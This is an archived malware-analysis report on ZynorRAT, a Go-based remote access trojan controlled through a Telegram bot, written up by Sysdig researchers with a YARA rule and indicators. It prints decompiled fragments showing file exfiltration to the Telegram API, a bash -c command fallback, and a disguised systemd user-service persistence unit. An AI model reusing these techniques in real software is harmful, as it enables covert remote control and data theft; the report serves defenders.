{
	"id": "8c4772f4-ae5d-4104-af9d-50f69d931535",
	"created_at": "2026-04-06T00:20:14.862475Z",
	"updated_at": "2026-04-10T03:21:30.839887Z",
	"deleted_at": null,
	"sha1_hash": "9ba718ee4256b979c9a2bc8ac546cc3f5a9f245e",
	"title": "ZynorRAT technical analysis: Reverse engineering a novel, Turkish Go-based RAT",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2840781,
	"plain_text": "ZynorRAT technical analysis: Reverse engineering a novel,\r\nTurkish Go-based RAT\r\nBy Alessandra Rizzo\r\nPublished: 2025-09-09 · Archived: 2026-04-05 23:12:03 UTC\r\nhttps://www.sysdig.com/blog/zynorrat-technical-analysis-reverse-engineering-a-novel-turkish-go-based-rat\r\nPage 1 of 25\n\nIntroduction\r\nDuring a recent threat hunting exercise, the Sysdig Threat Research Team (TRT) identified a new sample we have\r\ndubbed ZynorRAT. It is a Go-based Remote Access Trojan (RAT) that provides a full suite of custom command\r\nand control (C2) capabilities for both Linux and Windows.\r\nZynorRAT was first submitted to VirusTotal on July 8, 2025, and has no significant similarities to other known\r\nmalware families. We are confident that the developer is actively working on making ZynorRAT less\r\ndetectable, as seen through multiple uploads to VirusTotal in which the detection count drops. The use of Telegram\r\nto control the botnet simplifies management and allows the author to automate their actions. Based on Telegram\r\nchats, network logs, strings discovered during reverse engineering, and VirusTotal telemetry, TRT is confident that\r\nZynorRAT is of Turkish origin.\r\nBy monitoring Telegram channels associated with the malware, we have been able to observe the malware’s\r\ndevelopment and speculate that the author’s goal is to sell it once completed. 
To better understand ZynorRAT, we\r\nhave analyzed its capabilities, explored attribution, and provided detections and indicators of compromise (IoCs).\r\nExplore our complete technical analysis below.\r\nZynorRAT for Linux\r\nZynorRAT was developed in Go and offers multiple capabilities to the attacker. Its main purpose is to serve as a\r\ncollection, exfiltration, and remote access tool, which is centrally managed through a Telegram bot. Telegram\r\nserves as the main C2 infrastructure through which the malware receives further commands once deployed on a\r\nvictim machine.\r\nWe found several instances of this malware on VirusTotal; the first was uploaded under the name “zynor” on\r\nJuly 8, 2025, and was flagged as malicious by only 22 of 66 security vendors. It was then reuploaded two days\r\nlater, on July 10, with a lower malicious score; only 16 out of 66 vendors detected it. This likely indicates the\r\ndeveloper is refining ZynorRAT to make it less detectable.\r\nTechnical analysis\r\nThe binary we analyzed, SHA256 bceccc566fe3ae3675f7e20100f979eaf2053d9a4f3a3619a550a496a4268ef5, is\r\nan ELF 64-bit executable compiled for x86-64 with Go. The binary is not packed or stripped and contains most of\r\nits functionality, symbols, and artifacts in clear text. Its size is almost 10 MB, which is particularly large but\r\nexpected for Go-compiled executables.\r\nUsing radare2 for reverse engineering, we were able to uncover the main functions of the malware, along with\r\ntheir wrapper functions, as detailed below. 
This provided a good starting point for the decompiling phase, where\r\nwe uncovered significant details of ZynorRAT’s inner workings.\r\nThe functions and their logic remained unchanged across all seven of the Linux samples we analyzed, which are\r\nprovided in the IoCs section.\r\nThe malware is a RAT that, upon landing on a victim machine, performs operations requested by the remote\r\nattacker through a Telegram bot, which turns the bot into a C2 suite. The malware currently supports several\r\nfunctions, such as file exfiltration, system enumeration, screenshot capture, persistence through systemd services,\r\nand arbitrary command execution.\r\nWe ascertained from the attacker’s chat with the bot that once the attacker sends a command to the victim's\r\nmachine, the victim responds within the same minute with the command result. Anything sent by the attacker that\r\nis not one of the hardcoded commands is executed as a bash command by prepending “bash -c” to the string sent over.\r\nDiscovery\r\nThe function handleListDirectory, invoked by the /fs_list command received from the C2, is responsible for\r\nenumerating directories on a victim machine, then logging and sending its findings back to the Telegram bot. Each\r\nentry's name is concatenated with a newline (\\n), and the string is grown dynamically if needed using a\r\nruntime.growslice call.\r\nThe function handleMetrics, invoked by the /metrics command received from the bot, is responsible for\r\nperforming system enumeration and profiling. It does so by first making an HTTP request to the domain\r\n“api.ipify.org”, which returns the public IP address of the victim machine. 
It also enumerates the hostname and the\r\ncurrent user.\r\nos.hostname();\r\nos/user.Current();\r\nnet/http.(*Client).Get((http.Client *)net/http.DefaultClient,\"https://api.ipify.org\",0x15);\r\nThe function handleListProcesses is invoked upon receiving the /proc_list command from the C2, and it\r\nuses the os/exec package to execute a ps command on the victim machine. It concatenates its findings and\r\nsends them back to the C2.\r\nos/exec.Command(\"ps\",2,\u0026local_18,1,1);\r\nos/exec.(*Cmd).CombinedOutput(this);\r\nfmt.Sprintf(\u0026DAT_007cd3eb,0x21,\u0026local_28,1,1);\r\nmain.sendMessage(extraout_RAX_00,0x21);\r\n...\r\nruntime.concatstring2(0,\u0026DAT_007cb8dc,0x1e,extraout_RAX,2);\r\nmain.sendMessage(extraout_RAX_01,\u0026DAT_007cb8dc);\r\nExfiltration\r\nThe function handleGetFile, which is invoked by the /fs_get command, is responsible for processing file\r\nrequests from the C2. It contains several validation steps to check if the file exists and whether it is accessible; if\r\nnot, it logs the error and sends it back to the C2. If the requested file is found, the function calls the\r\nsendDocument function, which is responsible for ultimately exfiltrating the file. 
It does so by preparing a buffer\r\ncontaining the file content in bytes, as part of the final HTTP request that will send the file back to the Telegram\r\nbot. The request is a multipart/form-data upload carrying the chat_id, caption, and document fields expected by\r\nthe Telegram Bot API sendDocument method, with the file content copied into the document part.\r\n/* Name: main.sendDocument\r\n   Start: 006bc8a0\r\n   End: 006bd240 */\r\nvoid main.sendDocument(undefined8 param_1,long param_2,undefined8 param_3,undefined8 param_4)\r\n{\r\n    ...\r\n    os.OpenFile(param_1,local_e8,0,0);\r\n    /* D:/halil/lrat/main.go:391 */\r\n    return;\r\n    }\r\n    ...\r\n    mime/multipart.(*Writer).WriteField(this,\"chat_id\",7,extraout_RAX_05,2);\r\n    /* D:/halil/lrat/main.go:403 */\r\n    mime/multipart.(*Writer).WriteField\r\n        (this,\"caption\",7,uStack0000000000000018,uStack0000000000000020);\r\n    mime/multipart.(*Writer).CreateFormFile(this,\"document\",8,extraout_RAX_06,lVar1);\r\n    puVar4 = go:itab.*os.File,io.Reader;\r\n    io.copyBuffer(extraout_RAX_07,\"document\",go:itab.*os.File,io.Reader,extraout_RAX,0,0,0);\r\n    ...\r\n    return;\r\n}\r\nThe function handleScreenshot is invoked upon receiving the /capture_display command from the C2, and\r\nit uses the benign open source library screenshot (github.com/kbinani/screenshot). 
It effectively captures the desktop screen by first\r\nenumerating the number of active displays, capturing their contents, encoding the captured image as PNG into a\r\ntemporary file, and then sending that file to the Telegram bot through sendDocument.\r\ngithub.com/kbinani/screenshot.NumActiveDisplays();\r\ngithub.com/kbinani/screenshot.GetDisplayBounds(lVar2);\r\ngithub.com/kbinani/screenshot.Capture(0,0,lVar3,lVar4);\r\nos.CreateTemp(0,0,\u0026DAT_007c49ad,0x10);\r\nruntime.newobject(\u0026datatype.Struct.png.Encoder);\r\nimage/png.(*Encoder).Encode (this,go:itab.*os.File,io.Writer,extraout_RAX_02,go:itab.*image.RGBA,image.Image,\r\n    extraout_RAX_01);\r\nmain.sendMessage(extraout_RAX_04,0x1f);\r\nos.(*file).close((os.file *)*extraout_RAX_02);\r\nmain.sendDocument(*(undefined8 *)(*extraout_RAX_02 + 0x38),\r\nWe saw evidence of the attacker invoking this function during our investigation of the Telegram chat between the\r\nattacker and the bot, as shown below:\r\nUser “134errors” sends the command /capture_display, and the bot immediately sends back a screenshot of the\r\nvictim's desktop.\r\nPersistence\r\nZynorRAT implements a persistence mechanism by abusing systemd user services. Systemd allows user-specific\r\nservice definition files under “~/.config/systemd/user”, which is not commonly seen. 
It does so by\r\ncreating a service file at the path ~/.config/systemd/user/system-audio-manager.service, which contains the\r\nfollowing:\r\n[Unit]\r\nDescription=System Audio Core Service\r\nAfter=network.target\r\n[Service]\r\nExecStart=/home/user/.local/bin/audio\r\nRestart=always\r\nRestartSec=10\r\n[Install]\r\nWantedBy=default.target\r\nIt loads the new service file by executing:\r\nsystemctl --user daemon-reload\r\nCreation of unit files under ~/.config/systemd/user and invocations of systemctl --user are therefore useful\r\nindicators of this persistence technique on hosts where users do not normally define their own services.\r\nImpact\r\nThe tool is able to kill a running process on the victim machine if the command /proc_kill is received from\r\nthe C2. It does so by executing the kill command along with the PID of the targeted process. The PID is\r\npresumably obtained through the earlier described handleListProcesses function, which returns a list of running\r\nprocesses. The result of the kill operation is then logged and sent back as a notification to the C2.\r\nos/exec.Command(\"kill\",4,\u0026local_28,2,2);\r\nos/exec.(*Cmd).Run(this);\r\nmain.sendMessage(extraout_RAX_00,0x22);\r\nShell execution\r\nIf the input received from the C2 matches none of the built-in commands, the fallback and default behavior of this\r\nmalware is to execute that input as a shell command on the machine. 
If the attacker’s input received by the malware\r\ndoes not match any of the command instructions listed above, the input itself is parsed and executed by default\r\nwith bash -c \u003ccommand\u003e.\r\nThis effectively acts as a command executor for the attacker and allows them to achieve remote code execution on\r\nthe victim's machine.\r\nhandleShellCommand\r\nlocal_48 = \"-c\";\r\nos/exec.Command(\"bash\",4,\u0026local_48,2,2);\r\nos/exec.(*Cmd).CombinedOutput(this);\r\nWe found evidence of this function being used during our investigation of the Telegram chat. In one instance, the\r\nattacker sent over the command sudo su to execute on the victim's machine. The bot promptly executed the\r\ncommand and returned a log message.\r\nZynorRAT for Windows\r\nThe Windows version of ZynorRAT was also compiled with Go and is identical to the Linux version. The same\r\nfunctions are also present, along with the Telegram bot information.\r\nThis version of the malware was not adapted for Windows. 
Despite being compiled as a Windows executable, it\r\nperforms Linux-only persistence logic using systemd commands and .config paths.\r\nIt is plausible to think that the malware developer was trying to check VirusTotal’s detection capabilities and has\r\nnot fully developed the Windows version of ZynorRAT yet.\r\nTelegram C2\r\nWe were able to extract Telegram bot information using Tosint.\r\nWe found a dedicated bot named “lrat,” active on Telegram as the user “lraterrorsbot”.\r\nFiles communicating with the ZynorRAT bot can be tracked in VirusTotal.\r\nSince the chat_id value from the decompiled binary was not entirely retrievable, we polled the bot for updates\r\nusing the following Python script:\r\nimport requests\r\nimport time\r\n# === CONFIG ===\r\nBOT_TOKEN = '\u003cattacker_token\u003e'\r\nAPI_URL = f'https://api.telegram.org/bot{BOT_TOKEN}/getUpdates'\r\nTIMEOUT = 60  # seconds\r\nPOLL_INTERVAL = 1  # delay\r\n# === STATE ===\r\nlast_update_id = None\r\nprint(\"Starting Telegram long-polling...\")\r\nwhile True:\r\n    try:\r\n        params = {\r\n            'timeout': TIMEOUT,\r\n        }\r\n        if last_update_id is not None:\r\n            # Acknowledge everything up to the last update already seen\r\n            params['offset'] = last_update_id + 1\r\n        response = requests.get(API_URL, params=params, timeout=TIMEOUT + 5)\r\n        result = response.json()\r\n        if result.get(\"ok\") and result.get(\"result\"):\r\n            for update in result[\"result\"]:\r\n                update_id = update[\"update_id\"]\r\n                print(f\"[+] New update: {update}\")\r\n                last_update_id = update_id\r\n        else:\r\n            time.sleep(POLL_INTERVAL)\r\n    except Exception as e:\r\n        print(f\"[!] Error: {e}\")\r\n        time.sleep(5)\r\nWe left the script running for over 10 days, and we finally received an update from the attacker’s chat, revealing\r\nits ID and the text sent to the bot, “ip” and “id”.\r\nWith the chat ID obtained, we were then able to make a simple Bash script to forward all past messages from the\r\nattacker’s chat with the bot to a script that records the chatter.\r\nbot_token=\"\u003cattacker's bot token\u003e\" # Bot token\r\nfrom_chat_id=\"\u003cattacker's chat id\u003e\" # Attacker's chat ID\r\nto_chat_id=\"\u003cour chat id\u003e\" # Our chat ID with the bot\r\nfor message_id in $(seq 1 1000); do\r\n    curl -s -X POST \"https://api.telegram.org/bot${bot_token}/forwardMessage\" \\\r\n        -H \"Content-Type: application/json\" \\\r\n        -d \"{\\\"from_chat_id\\\":\\\"${from_chat_id}\\\",\\\"chat_id\\\":\\\"${to_chat_id}\\\",\\\"message_id\\\":${message_id}}\"\r\ndone\r\nThe attacker’s chat revealed ample evidence of compromise, commands executed, and many screenshots taken\r\nfrom the victim's host as shown in previous examples.\r\nWe were also able to reveal that the executables are distributed by the attacker using Dosya.co, a file-sharing\r\nservice.\r\nScreenshot obtained from the bot\r\nAs seen in the image, the executable zynor is still hosted on the website at the time of this writing.\r\nWe have also confirmed that the malware seems to be in its early stages of development. 
There are many\r\nscreenshots, plausibly from the attacker’s own test machines, that show the attacker compiling and running the\r\nRAT using VSCode and the go run command, and then executing commands such as /capture_display to\r\ncheck whether the functionality actually works.\r\nGiven that the bot reports information about the machine where it landed, we were able to extract a list of\r\nIP addresses, together with their ASNs and ISPs, from the Telegram messages.\r\nA significant number of them belong to cloud providers, which makes it reasonable to think that the attacker\r\nstarted testing their malware around July 9th by installing it on cloud instances that do not really belong to victim\r\nmachines. 
A reverse IP lookup on some of the Amazon IPs confirmed that they map to EC2\r\ninstances.\r\nIt is also reasonable to think that some of the Turkish IP addresses belong to the attacker. Nonetheless, we cannot\r\ndiscount that some of the extracted IPs may belong to potential victims.\r\nAttribution\r\nThroughout our analysis, the name “halil” appeared several times in the decompiled binary (for example in the\r\nembedded source path D:/halil/lrat/main.go) and later in screenshots from the attacker's machine that we\r\nretrieved through Telegram. It is plausible to think that the\r\nattacker’s name or nickname may be “halil,” and that this RAT is the work (in progress) of a single individual. We\r\npredict that this malware, still in early stages of development, may start to appear for sale in underground markets.\r\nThis is not an uncommon occurrence, where a relatively skilled malicious actor develops malware with the sole\r\npurpose of selling it to others rather than conducting malicious operations themselves. For example, below is a\r\nscreenshot of a similar malware, “SilentEye,” that was being sold on an underground forum in January 2025 and\r\nreported by ThreatMon on X.\r\nWe have not found any evidence on underground forums that this malware is being actively sold. Since we believe\r\nthe attacker is in the early stages of development, ZynorRAT is likely not yet publicly released.\r\nDetection\r\nSysdig Secure customers are protected from the ZynorRAT threat with the following rules. 
Depending on the\r\ncommands run by the attacker, additional threat detections will trigger, such as persistence commands.\r\nDNS Lookup for Reconnaissance Service Detected (Sysdig Runtime Notable Events)\r\nDNS Lookup for Suspicious Domain Detected (Sysdig Runtime Notable Events)\r\nMAL_ZYNOR Yara Rule (Malware Detection policy)\r\nrule MAL_ZYNOR {\r\n    meta:\r\n        md5 = \"7422122eec7cfb3ec44737607d3ff5d2\"\r\n        description = \"Detects ZynorRAT\"\r\n        author = \"Sysdig TRT\"\r\n        date = \"2025-08-04\"\r\n        tags = \"zynor, ELF\"\r\n        reference = \"Internal Research\"\r\n        version = \"1.0\"\r\n    strings:\r\n        $s1 = \"main.handleShellCommand\"\r\n        $s2 = \"main.handlePersistence\"\r\n        $s3 = \"https://api.telegram.org/bot%s/sendMessage?chat_id=%d\u0026text=%s\" ascii\r\n        $s4 = \"https://api.telegram.org/bot%s/sendDocument\" ascii\r\n    condition:\r\n        uint32(0) == 0x464c457f and\r\n        1 of ($s1, $s2) and\r\n        1 of ($s3, $s4)\r\n}\r\nBecause the condition requires the ELF magic (uint32(0) == 0x464c457f), this rule matches only the Linux\r\nsamples, although the same handler symbols and Telegram strings are also present in the Windows build.\r\nConclusion\r\nAlthough the malware ecosystem has no shortage of RATs, malware developers are still dedicating their time to\r\ncreating them from scratch. ZynorRAT is a novel remote access trojan that was developed in Go and is still in\r\nits early stages, as highlighted by the numerous testing screenshots and commands we were able to retrieve from\r\nits integrated Telegram bot. ZynorRAT’s customization and automated controls underline the evolving\r\nsophistication of modern malware, even in its earliest stages.\r\nWe assess with high confidence that this tool will soon hit the underground markets, either on forums or via\r\nTelegram, where the sale of malicious software is common. 
ZynorRAT provides several critical capabilities, such\r\nas file exfiltration, reconnaissance and discovery, persistence, and remote code execution on victim machines. We\r\npredict that the malware author will continue developing the Windows version of the malware to improve their\r\nreach.\r\nRuntime threat detection remains critical to a defense-in-depth strategy to detect these types of threats. Linux is\r\nbecoming increasingly targeted by threat actors, and the number of tools available to them continues to increase.\r\nAppendix\r\nCommands used by ZynorRAT\r\nCommand Match     Handler Called             Behavior Description\r\n/help             main.sendMessage           Displays help message\r\n/fs_get           main.handleGetFile         File exfiltration\r\n/fs_list          main.handleListDirectory   List directory contents\r\n/metrics          main.handleMetrics         Gather system metrics\r\n/persistence      main.handlePersistence     Establish persistence (e.g., autorun)\r\n/proc_kill        main.handleKillProcess     Kill process\r\n/proc_list        main.handleListProcesses   List running processes\r\n/capture_display  main.handleScreenshot      Take screenshot\r\nAnything else     main.handleShellCommand    Executes arbitrary shell commands\r\nIoCs\r\nDomains\r\napi.telegram.org\r\nSource: https://www.sysdig.com/blog/zynorrat-technical-analysis-reverse-engineering-a-novel-turkish-go-based-rat",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.sysdig.com/blog/zynorrat-technical-analysis-reverse-engineering-a-novel-turkish-go-based-rat"
	],
	"report_names": [
		"zynorrat-technical-analysis-reverse-engineering-a-novel-turkish-go-based-rat"
	],
	"threat_actors": [],
	"ts_created_at": 1775434814,
	"ts_updated_at": 1775791290,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9ba718ee4256b979c9a2bc8ac546cc3f5a9f245e.pdf",
		"text": "https://archive.orkl.eu/9ba718ee4256b979c9a2bc8ac546cc3f5a9f245e.txt",
		"img": "https://archive.orkl.eu/9ba718ee4256b979c9a2bc8ac546cc3f5a9f245e.jpg"
	}
}